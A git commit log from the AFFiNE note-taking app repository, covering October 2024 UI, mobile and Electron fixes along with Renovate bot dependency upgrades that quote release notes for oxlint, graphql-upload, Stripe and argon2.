darkskygit
4b9e2abe9f
feat: refresh captcha correctly ( #8491 )
...
fix AF-1482
2024-10-16 11:35:58 +08:00
renovate
fa2690064d
chore: bump up oxlint version to v0.9.10 ( #8354 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.9.6` -> `0.9.10`](https://renovatebot.com/diffs/npm/oxlint/0.9.6/0.9.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.9.10`](https://redirect.github.com/oxc-project/oxc/releases/tag/oxlint_v0.9.10 ): oxlint v0.9.10
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.9...oxlint_v0.9.10 )
#### \[0.9.10] - 2024-10-08
- [`95ca01c`](https://redirect.github.com/oxc-project/oxc/commit/95ca01c ) cfg: \[**BREAKING**] Make BasicBlock::unreachable private ([#​6321](https://redirect.github.com/oxc-project/oxc/issues/6321 )) (DonIsaac)
- [`5a73a66`](https://redirect.github.com/oxc-project/oxc/commit/5a73a66 ) regular_expression: \[**BREAKING**] Simplify public APIs ([#​6262](https://redirect.github.com/oxc-project/oxc/issues/6262 )) (leaysgur)
##### Features
- [`f272137`](https://redirect.github.com/oxc-project/oxc/commit/f272137 ) editors/vscode: Clear diagnostics on file deletion ([#​6326](https://redirect.github.com/oxc-project/oxc/issues/6326 )) (dalaoshu)
- [`1a5f293`](https://redirect.github.com/oxc-project/oxc/commit/1a5f293 ) editors/vscode: Update VSCode extention to use project's language server ([#​6132](https://redirect.github.com/oxc-project/oxc/issues/6132 )) (dalaoshu)
- [`376cc09`](https://redirect.github.com/oxc-project/oxc/commit/376cc09 ) linter: Implement `no-throw-literal` ([#​6144](https://redirect.github.com/oxc-project/oxc/issues/6144 )) (dalaoshu)
- [`5957214`](https://redirect.github.com/oxc-project/oxc/commit/5957214 ) linter: Allow fixing in files with source offsets ([#​6197](https://redirect.github.com/oxc-project/oxc/issues/6197 )) (camchenry)
- [`a089e19`](https://redirect.github.com/oxc-project/oxc/commit/a089e19 ) linter: Eslint/no-else-return ([#​4305](https://redirect.github.com/oxc-project/oxc/issues/4305 )) (yoho)
- [`183739f`](https://redirect.github.com/oxc-project/oxc/commit/183739f ) linter: Implement prefer-await-to-callbacks ([#​6153](https://redirect.github.com/oxc-project/oxc/issues/6153 )) (dalaoshu)
- [`ae539af`](https://redirect.github.com/oxc-project/oxc/commit/ae539af ) linter: Implement no-return-assign ([#​6108](https://redirect.github.com/oxc-project/oxc/issues/6108 )) (Radu Baston)
##### Bug Fixes
- [`00df6e5`](https://redirect.github.com/oxc-project/oxc/commit/00df6e5 ) linter: Friendly diagnostic messages for `no-else-return` ([#​6349](https://redirect.github.com/oxc-project/oxc/issues/6349 )) (DonIsaac)
- [`71ad5d3`](https://redirect.github.com/oxc-project/oxc/commit/71ad5d3 ) linter: `no-else-return` fixer fails when `else` has no trailing whitespace ([#​6348](https://redirect.github.com/oxc-project/oxc/issues/6348 )) (DonIsaac)
- [`9e9808b`](https://redirect.github.com/oxc-project/oxc/commit/9e9808b ) linter: Fix regression when parsing ts in vue files ([#​6336](https://redirect.github.com/oxc-project/oxc/issues/6336 )) (Boshen)
- [`93c6db6`](https://redirect.github.com/oxc-project/oxc/commit/93c6db6 ) linter: Improve docs and diagnostics message for no-else-return ([#​6327](https://redirect.github.com/oxc-project/oxc/issues/6327 )) (DonIsaac)
- [`e0a3378`](https://redirect.github.com/oxc-project/oxc/commit/e0a3378 ) linter: Correct false positive in `unicorn/prefer-string-replace-all` ([#​6263](https://redirect.github.com/oxc-project/oxc/issues/6263 )) (H11)
- [`ea28ee9`](https://redirect.github.com/oxc-project/oxc/commit/ea28ee9 ) linter: Improve the fixer of `prefer-namespace-keyword` ([#​6230](https://redirect.github.com/oxc-project/oxc/issues/6230 )) (dalaoshu)
- [`f6a3450`](https://redirect.github.com/oxc-project/oxc/commit/f6a3450 ) linter: Get correct source offsets for astro files ([#​6196](https://redirect.github.com/oxc-project/oxc/issues/6196 )) (camchenry)
- [`be0030c`](https://redirect.github.com/oxc-project/oxc/commit/be0030c ) linter: Allow whitespace control characters in `no-control-regex` ([#​6140](https://redirect.github.com/oxc-project/oxc/issues/6140 )) (camchenry)
- [`e7e8ead`](https://redirect.github.com/oxc-project/oxc/commit/e7e8ead ) linter: False positive in `no-return-assign` ([#​6128](https://redirect.github.com/oxc-project/oxc/issues/6128 )) (DonIsaac)
##### Performance
- [`ac0a82a`](https://redirect.github.com/oxc-project/oxc/commit/ac0a82a ) linter: Reuse allocator when there are multiple source texts ([#​6337](https://redirect.github.com/oxc-project/oxc/issues/6337 )) (Boshen)
- [`50a0029`](https://redirect.github.com/oxc-project/oxc/commit/50a0029 ) linter: Do not concat vec in `no-useless-length-check` ([#​6276](https://redirect.github.com/oxc-project/oxc/issues/6276 )) (camchenry)
##### Documentation
- [`7ca70dd`](https://redirect.github.com/oxc-project/oxc/commit/7ca70dd ) linter: Add docs for `ContextHost` and `LintContext` ([#​6272](https://redirect.github.com/oxc-project/oxc/issues/6272 )) (camchenry)
- [`a949ecb`](https://redirect.github.com/oxc-project/oxc/commit/a949ecb ) linter: Improve docs for `eslint/getter-return` ([#​6229](https://redirect.github.com/oxc-project/oxc/issues/6229 )) (DonIsaac)
- [`14ba263`](https://redirect.github.com/oxc-project/oxc/commit/14ba263 ) linter: Improve docs for `eslint-plugin-import` rules ([#​6131](https://redirect.github.com/oxc-project/oxc/issues/6131 )) (dalaoshu)
##### Refactor
- [`40932f7`](https://redirect.github.com/oxc-project/oxc/commit/40932f7 ) cfg: Use IndexVec for storing basic blocks ([#​6323](https://redirect.github.com/oxc-project/oxc/issues/6323 )) (DonIsaac)
- [`642725c`](https://redirect.github.com/oxc-project/oxc/commit/642725c ) linter: Rename vars from `ast_node_id` to `node_id` ([#​6305](https://redirect.github.com/oxc-project/oxc/issues/6305 )) (overlookmotel)
- [`8413175`](https://redirect.github.com/oxc-project/oxc/commit/8413175 ) linter: Move shared function from utils to rule ([#​6127](https://redirect.github.com/oxc-project/oxc/issues/6127 )) (dalaoshu)
- [`ba9c372`](https://redirect.github.com/oxc-project/oxc/commit/ba9c372 ) linter: Make jest/vitest rule mapping more clear ([#​6273](https://redirect.github.com/oxc-project/oxc/issues/6273 )) (camchenry)
- [`82b8f21`](https://redirect.github.com/oxc-project/oxc/commit/82b8f21 ) linter: Add schemars and serde traits to AllowWarnDeny and RuleCategories ([#​6119](https://redirect.github.com/oxc-project/oxc/issues/6119 )) (DonIsaac)
- [`ea908f7`](https://redirect.github.com/oxc-project/oxc/commit/ea908f7 ) linter: Consolidate file loading logic ([#​6130](https://redirect.github.com/oxc-project/oxc/issues/6130 )) (DonIsaac)
- [`db751f0`](https://redirect.github.com/oxc-project/oxc/commit/db751f0 ) linter: Use regexp AST visitor in `no-control-regex` ([#​6129](https://redirect.github.com/oxc-project/oxc/issues/6129 )) (camchenry)
- [`3aa7e42`](https://redirect.github.com/oxc-project/oxc/commit/3aa7e42 ) linter: Use RegExp AST visitor for `no-hex-escape` ([#​6117](https://redirect.github.com/oxc-project/oxc/issues/6117 )) (camchenry)
- [`9d5b44a`](https://redirect.github.com/oxc-project/oxc/commit/9d5b44a ) linter: Use regex visitor in `no-regex-spaces` ([#​6063](https://redirect.github.com/oxc-project/oxc/issues/6063 )) (camchenry)
- [`0d44cf7`](https://redirect.github.com/oxc-project/oxc/commit/0d44cf7 ) linter: Use regex visitor in `no-useless-escape` ([#​6062](https://redirect.github.com/oxc-project/oxc/issues/6062 )) (camchenry)
- [`eeb8873`](https://redirect.github.com/oxc-project/oxc/commit/eeb8873 ) linter: Use regex visitor in `no-empty-character-class` ([#​6058](https://redirect.github.com/oxc-project/oxc/issues/6058 )) (camchenry)
##### Testing
- [`d883562`](https://redirect.github.com/oxc-project/oxc/commit/d883562 ) linter: Invalid `eslint/no-unused-vars` options ([#​6228](https://redirect.github.com/oxc-project/oxc/issues/6228 )) (DonIsaac)
### [`v0.9.9`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#099---2024-09-27 )
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.8...oxlint_v0.9.9 )
##### Bug Fixes
- [`01b9c4b`](https://redirect.github.com/oxc-project/oxc/commit/01b9c4b ) npm/oxlint: Make bin/oxc_language_server an executable ([#​6066](https://redirect.github.com/oxc-project/oxc/issues/6066 )) (Boshen)
### [`v0.9.8`](https://redirect.github.com/oxc-project/oxc/releases/tag/oxlint_v0.9.8 ): oxlint v0.9.8
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.7...oxlint_v0.9.8 )
#### \[0.9.8] - 2024-09-24
##### Bug Fixes
- [`e3c8a12`](https://redirect.github.com/oxc-project/oxc/commit/e3c8a12 ) linter: Fix panic in sort-keys ([#​6017](https://redirect.github.com/oxc-project/oxc/issues/6017 )) (Boshen)
- [`4771492`](https://redirect.github.com/oxc-project/oxc/commit/4771492 ) linter: Fix `import/no_cycle` with `ignoreTypes` ([#​5995](https://redirect.github.com/oxc-project/oxc/issues/5995 )) (Boshen)
##### Performance
- [`5ae3f36`](https://redirect.github.com/oxc-project/oxc/commit/5ae3f36 ) linter: `no-fallthrough`: Use string matching instead of Regex for default comment pattern ([#​6008](https://redirect.github.com/oxc-project/oxc/issues/6008 )) (camchenry)
- [`65d8f9e`](https://redirect.github.com/oxc-project/oxc/commit/65d8f9e ) linter, ast-tools, coverage: Use `FxHashSet` instead of `std::collections::HashSet` ([#​6001](https://redirect.github.com/oxc-project/oxc/issues/6001 )) (Cam McHenry)
- [`2b17003`](https://redirect.github.com/oxc-project/oxc/commit/2b17003 ) linter, prettier, diagnostics: Use `FxHashMap` instead of `std::collections::HashMap` ([#​5993](https://redirect.github.com/oxc-project/oxc/issues/5993 )) (camchenry)
### [`v0.9.7`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#097---2024-09-23 )
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.6...oxlint_v0.9.7 )
##### Refactor
- [`ba7b01f`](https://redirect.github.com/oxc-project/oxc/commit/ba7b01f ) linter: Add `LinterBuilder` ([#​5714](https://redirect.github.com/oxc-project/oxc/issues/5714 )) (DonIsaac)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-10-16 11:27:27 +08:00
pengx17
7381b5e9f1
fix(mobile): handle touch event correctly ( #8496 )
...
related:
radix-ui has a hack for dealing with touch event on mobile devices. we may not want to stop propagation for event that is not being handled, even for links
74b182b401/packages/react/dismissable-layer/src/DismissableLayer.tsx (L243-L261)
2024-10-16 11:24:23 +08:00
CatsJuice
9d953104fa
chore: bump theme ( #8478 )
2024-10-16 11:23:35 +08:00
darkskygit
62d2e220ba
feat: separate user content from prompt ( #8480 )
2024-10-16 11:23:22 +08:00
JimmFly
80c92bed90
fix(core): sidebar can not be collapsed on mobile ( #8475 )
...
close AF-1474
2024-10-16 11:23:10 +08:00
renovate
38806e2d39
chore: bump up @blocksuite/icons version to v2.1.68 ( #8459 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@blocksuite/icons](https://redirect.github.com/toeverything/icons ) | [`2.1.67` -> `2.1.68`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.67/2.1.68 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>toeverything/icons (@​blocksuite/icons)</summary>
### [`v2.1.68`](4bdeb1d0ae...10046ca695 )
[Compare Source](4bdeb1d0ae...10046ca695 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguMTE1LjEiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-10-16 11:23:03 +08:00
renovate
0dbf73be51
chore: bump up @blocksuite/icons version to v2.1.68 ( #8458 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@blocksuite/icons](https://redirect.github.com/toeverything/icons ) | [`2.1.67` -> `2.1.68`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.67/2.1.68 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>toeverything/icons (@​blocksuite/icons)</summary>
### [`v2.1.68`](4bdeb1d0ae...10046ca695 )
[Compare Source](4bdeb1d0ae...10046ca695 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-10-16 11:22:59 +08:00
CatsJuice
5975a6fb2d
feat(core): bump theme, update workspace card color variables, add active status ( #8467 )
...
close AF-1468
2024-10-16 11:21:53 +08:00
renovate[bot]
6e9db761a4
chore: bump up @blocksuite/affine version to v0.17.18 ( #8468 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2024-10-10 12:14:03 +08:00
renovate
4f5aca56db
chore: bump up graphql-upload version to v17 ( #8449 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [graphql-upload](https://redirect.github.com/jaydenseric/graphql-upload ) | [`^16.0.2` -> `^17.0.0`](https://renovatebot.com/diffs/npm/graphql-upload/16.0.2/17.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>jaydenseric/graphql-upload (graphql-upload)</summary>
### [`v17.0.0`](https://redirect.github.com/jaydenseric/graphql-upload/blob/HEAD/changelog.md#1700 )
[Compare Source](https://redirect.github.com/jaydenseric/graphql-upload/compare/v16.0.2...v17.0.0 )
##### Major
- Updated Node.js support to `^18.18.0 || ^20.9.0 || >=22.0.0`.
- Updated dev dependencies, some of which require newer Node.js versions than previously supported.
- Use the TypeScript v5.5+ JSDoc tag `@import` to import types in modules.
- Removed JSDoc tag `@typedef` that were unintentionally re-exporting types; to migrate import TypeScript types from the correct module:
```diff
- import type { GraphQLUpload } from "graphql-upload/Upload.mjs";
+ import type GraphQLUpload from "graphql-upload/GraphQLUpload.mjs";
```
```diff
- import type { processRequest } from "graphql-upload/Upload.mjs";
+ import type processRequest from "graphql-upload/processRequest.mjs";
```
```diff
- import type { GraphQLUpload } from "graphql-upload/processRequest.mjs";
+ import type GraphQLUpload from "graphql-upload/GraphQLUpload.mjs";
```
- Refactored tests to use the standard `AbortController`, `fetch`, `File`, and `FormData` APIs available in modern Node.js and removed the dev dependencies [`node-abort-controller`](https://npm.im/node-abort-controller ) and [`node-fetch`](https://npm.im/node-fetch ).
- Replaced the test utility function `streamToString` with the function `text` from `node:stream/consumers` that’s available in modern Node.js.
- Use the Node.js test runner API and remove the dev dependency [`test-director`](https://npm.im/test-director ).
##### Minor
- Support Express v5 by updating the optional peer dependency [`@types/express`](https://npm.im/@​types/express ) to `4.0.29 - 5` and the dev dependency [`express`](https://npm.im/express ) to v5, via [#​389](https://redirect.github.com/jaydenseric/graphql-upload/pull/389 ).
##### Patch
- Tweaked the package description.
- Updated the `package.json` field `repository` to conform to new npm requirements.
- Updated the package scripts:
- Reordered the scripts.
- Replaced `npm run` with `node --run`.
- Updated GitHub Actions CI config:
- No longer run the workflow on pull request.
- Enable manual workflow dispatching.
- Run checks in seperate jobs.
- Removed custom step names.
- Replaced `npm run` with `node --run`.
- Updated the tested Node.js versions to v18, v20, v22.
- Updated `actions/checkout` to v4.
- Updated `actions/setup-node` to v4.
- Migrated to the ESLint v9 CLI and “flat” config.
- Integrated a new dev dependency [`eslint-plugin-jsdoc`](https://npm.im/eslint-plugin-jsdoc ) and revised types.
- Removed the Node.js CLI option `--unhandled-rejections=throw` in the package script `tests` as it’s now the default for all supported Node.js versions.
- Avoid hardcoding a default value in the type `FileUploadCreateReadStreamOptions` property `highWaterMark` description and use the function `getDefaultHighWaterMark` from `node:stream` in tests.
- Replaced the test helper class `Deferred` with polyfilled `Promise.withResolvers`.
- Removed an unnecessary `await` in tests.
- Omit unused catch bindings in the function `processRequest`.
- Corrected the JSDoc type `FileUploadCreateReadStreamOptions` in the module `processRequest.mjs`.
- Avoid using `return` in the middleware.
- Added a new dev dependency [`async-listen`](https://npm.im/async-listen ) to replace the test utility function `listen`.
- Enabled the TypeScript compiler options `noUnusedLocals` and `noUnusedParameters` and used the prefix `_` for purposefully unused function parameters in tests.
- Updated the GitHub Markdown syntax for alerts in the readme.
- Tweaked wording in the readme and JSDoc descriptions.
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguMTE0LjAiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-10-09 10:37:08 +00:00
JimmFly
5213431d51
feat(core): show floating sidebar when hovering sidebar swtich ( #8393 )
...
web:
https://github.com/user-attachments/assets/3cafe094-7938-4241-8d57-cfd5ccaadf25
client:
https://github.com/user-attachments/assets/ca218a45-de92-4e0a-ad83-c0f47aee2962
2024-10-09 03:48:17 +00:00
EYHN
bfeb05ca45
fix(core): data loss on enable cloud ( #8452 )
2024-10-08 09:24:26 +00:00
pengx17
ccd1ad617c
fix(electron): missing sidebar module for shell ( #8447 )
2024-10-08 07:18:04 +00:00
EYHN
67f7a4de9c
fix(electron): fix windows userspace loss ( #8450 )
2024-10-08 07:05:37 +00:00
L-Sun
9c8e8d74b6
chore(core): update full width layout padding of peekview ( #8446 )
...
Close [BS-1378](https://linear.app/affine-design/issue/BS-1378/center-peek-全宽布局padding错误 ), related to [AF-1052]( https://linear.app/affine-design/issue/AF-1052/embed-view-候选区域-full-screen-时显示异常,需要修改-padding )
2024-10-08 05:32:04 +00:00
fundon
a2400f3851
refactor(core): optimize editor params synchronization ( #8346 )
2024-10-08 05:12:00 +00:00
CatsJuice
2569717e9b
chore(mobile): adjust tab height ( #8409 )
2024-10-08 05:01:12 +00:00
forehalo
e61ed98ac3
fix(core): avoid using serverUrlPrefix config ( #8448 )
2024-10-08 04:50:02 +00:00
JimmFly
cc4be9c670
chore: update app updater button style ( #8444 )
...
close AF-1461
2024-10-08 04:39:01 +00:00
L-Sun
afb21f734e
fix(core): fix position of toc in peekview ( #8441 )
...
Close [BS-1536](https://linear.app/affine-design/issue/BS-1536/peekview中的toc没有fixed )
2024-10-08 02:44:33 +00:00
Тимур
4da0231658
chore: pin postgresql version in self-host compose.yaml ( #8420 )
2024-10-08 10:44:14 +08:00
pengx17
a3dc074574
feat: ctrl click to open embeded doc in new tab ( #8401 )
...
fix AF-1176
depends on https://github.com/toeverything/blocksuite/pull/8478
2024-10-08 02:06:59 +00:00
renovate
80b28cc2a8
chore: Lock file maintenance ( #8404 )
...
This PR contains the following updates:
| Update | Change |
|---|---|
| lockFileMaintenance | All locks refreshed |
🔧 This Pull Request updates lock files to use the latest dependency versions.
---
### Configuration
📅 **Schedule**: Branch creation - "before 4am on Monday" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguODAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-10-07 17:20:37 +00:00
EYHN
c26df2e069
feat(infra): doc properties by orm ( #8382 )
...
create new orm table docConfiguration
move primary store to docConfiguration
2024-10-07 12:25:47 +00:00
pengx17
f5c49a6ac9
fix(electron): screen resize sometimes does not work well after maximize ( #8413 )
...
fix AF-1460
2024-10-07 11:21:57 +00:00
pengx17
6b263d1441
feat(electron): ctrl+= to zoomin on linux ( #8412 )
2024-10-07 10:56:49 +00:00
renovate
48ebcfc778
chore: bump up stripe version to v17 ( #8423 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [stripe](https://redirect.github.com/stripe/stripe-node ) | [`^16.0.0` -> `^17.0.0`](https://renovatebot.com/diffs/npm/stripe/16.12.0/17.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>stripe/stripe-node (stripe)</summary>
### [`v17.0.0`](https://redirect.github.com/stripe/stripe-node/blob/HEAD/CHANGELOG.md#1700---2024-10-01 )
[Compare Source](https://redirect.github.com/stripe/stripe-node/compare/v16.12.0...v17.0.0 )
- [#​2192](https://redirect.github.com/stripe/stripe-node/pull/2192 ) Support for APIs in the new API version 2024-09-30.acacia
This release changes the pinned API version to `2024-09-30.acacia`. Please read the [API Upgrade Guide](https://stripe.com/docs/upgrades#2024-09-30.acacia ) and carefully review the API changes before upgrading.
##### ⚠️ Breaking changes due to changes in the Stripe API
- Rename `usage_threshold_config` to `usage_threshold` on `Billing.AlertCreateParams` and `Billing.Alert`
- Remove support for `filter` on `Billing.AlertCreateParams` and `Billing.Alert`. Use the filters on the `usage_threshold` instead
- Remove support for `customer_consent_collected` on `Terminal.ReaderProcessSetupIntentParams`.
##### ⚠️ Other Breaking changes in the SDK
- Adjusted default values around reties for HTTP requests. You can use the old defaults by setting them explicitly. New values are:
- max retries: `1` -> `2`
- max timeout (seconds): `2` -> `5`
##### Additions
- Add support for `custom_unit_amount` on `ProductCreateParams.default_price_data`
- Add support for `allow_redisplay` on `Terminal.ReaderProcessPaymentIntentParams.process_config` and `Terminal.ReaderProcessSetupIntentParams`
- Add support for new value `international_transaction` on enum `Treasury.ReceivedCredit.failure_code`
- Add support for new value `2024-09-30.acacia` on enum `WebhookEndpointCreateParams.api_version`
- Add support for new Usage Billing APIs `Billing.MeterEvent`, `Billing.MeterEventAdjustments`, `Billing.MeterEventSession`, `Billing.MeterEventStream` and the new Events API `Core.Events` in the [v2 namespace ](https://docs.corp.stripe.com/api-v2-overview )
- Add method `parseThinEvent()` on the `Stripe` class to parse [thin events](https://docs.corp.stripe.com/event-destinations#events-overview ).
- Add method [rawRequest()](https://redirect.github.com/stripe/stripe-node/tree/master?tab=readme-ov-file#custom-requests ) on the `Stripe` class that takes a HTTP method type, url and relevant parameters to make requests to the Stripe API that are not yet supported in the SDK.
##### Changes
- Change `BillingPortal.ConfigurationCreateParams.features.subscription_update.default_allowed_updates` and `BillingPortal.ConfigurationCreateParams.features.subscription_update.products` to be optional
- [#​2195](https://redirect.github.com/stripe/stripe-node/pull/2195 ) Remove parseSnapshotEvent
- [#​2188](https://redirect.github.com/stripe/stripe-node/pull/2188 ) Revert "Add raw_request ([#​2185](https://redirect.github.com/stripe/stripe-node/issues/2185 ))"
- [#​2185](https://redirect.github.com/stripe/stripe-node/pull/2185 ) Add raw_request
Adds the ability to make raw requests to the Stripe API, by providing an HTTP method and url.
Example:
```node
import Stripe from 'stripe';
const stripe = new Stripe('sk_test_...');
const response = await stripe.rawRequest(
'POST',
'/v1/beta_endpoint',
{ param: 123 },
{ apiVersion: '2022-11-15; feature_beta=v3' }
);
```
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-10-05 14:48:08 +00:00
renovate
5da65de27a
chore: bump up @node-rs/argon2 version to v2 ( #8433 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@node-rs/argon2](https://redirect.github.com/napi-rs/node-rs ) | [`^1.8.0` -> `^2.0.0`](https://renovatebot.com/diffs/npm/@node-rs%2fargon2/1.8.3/2.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>napi-rs/node-rs (@​node-rs/argon2)</summary>
### [`v2.0.0`](https://redirect.github.com/napi-rs/node-rs/releases/tag/%40node-rs/argon2%402.0.0 )
[Compare Source](https://redirect.github.com/napi-rs/node-rs/compare/@node-rs/argon2@​1.8.3...@node-rs/argon2@​2.0.0 )
#### What's Changed
- feat(\*): upgrade to NAPI-RS 3.0 alpha by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn ) in [https://github.com/napi-rs/node-rs/pull/897 ](https://redirect.github.com/napi-rs/node-rs/pull/897 )
- fix!(argon2): respect the salt provided in hash options by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn ) in [https://github.com/napi-rs/node-rs/pull/899 ](https://redirect.github.com/napi-rs/node-rs/pull/899 )
**Full Changelog**: https://github.com/napi-rs/node-rs/compare/[@​node-rs/argon2](https://redirect.github.com/node-rs/argon2)[@​1](https://redirect.github.com/1).8.3...[@​node-rs/argon2](https://redirect.github.com/node-rs/argon2)[@​2](https://redirect.github.com/2).0.0
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
